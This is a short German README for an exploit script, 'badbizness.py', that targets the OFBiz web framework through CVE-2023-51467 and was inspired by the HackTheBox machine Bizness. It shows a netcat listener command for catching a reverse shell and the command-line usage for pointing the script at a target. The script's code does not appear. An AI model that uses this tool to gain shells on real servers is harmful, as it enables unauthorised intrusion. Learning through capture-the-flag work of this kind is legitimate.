
# Auto-Exploit-Skript für das Java-Web-Framework OF Biz unter CVE-2023-51467.

Automatisches Exploit-Skript für das Java-Webframework OF Biz unter CVE-2023-51467. Inspiriert von der HackTheBox-Maschine Bizness.
Dieses Skript benötigt das Tool ysoserial und OpenJDK Version 11. Siehe Verwendungsmenü für die Installation.
Richte einen Listener ein, um die Shell mit deiner bevorzugten Methode zu empfangen. Hier ein Netcat-Beispiel:
nc -nlvp 1337
Führe das Skript aus:
python3 badbizness.py [Pfad zu ysoserial-all.jar] [ZIEL-BASE-URL] [LISTENER-IP] [LISTENER-PORT]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
Dieses Tool diente als Möglichkeit, mehr über Python zu lernen. Ich danke Skript, das mir dabei gründlich geholfen hat.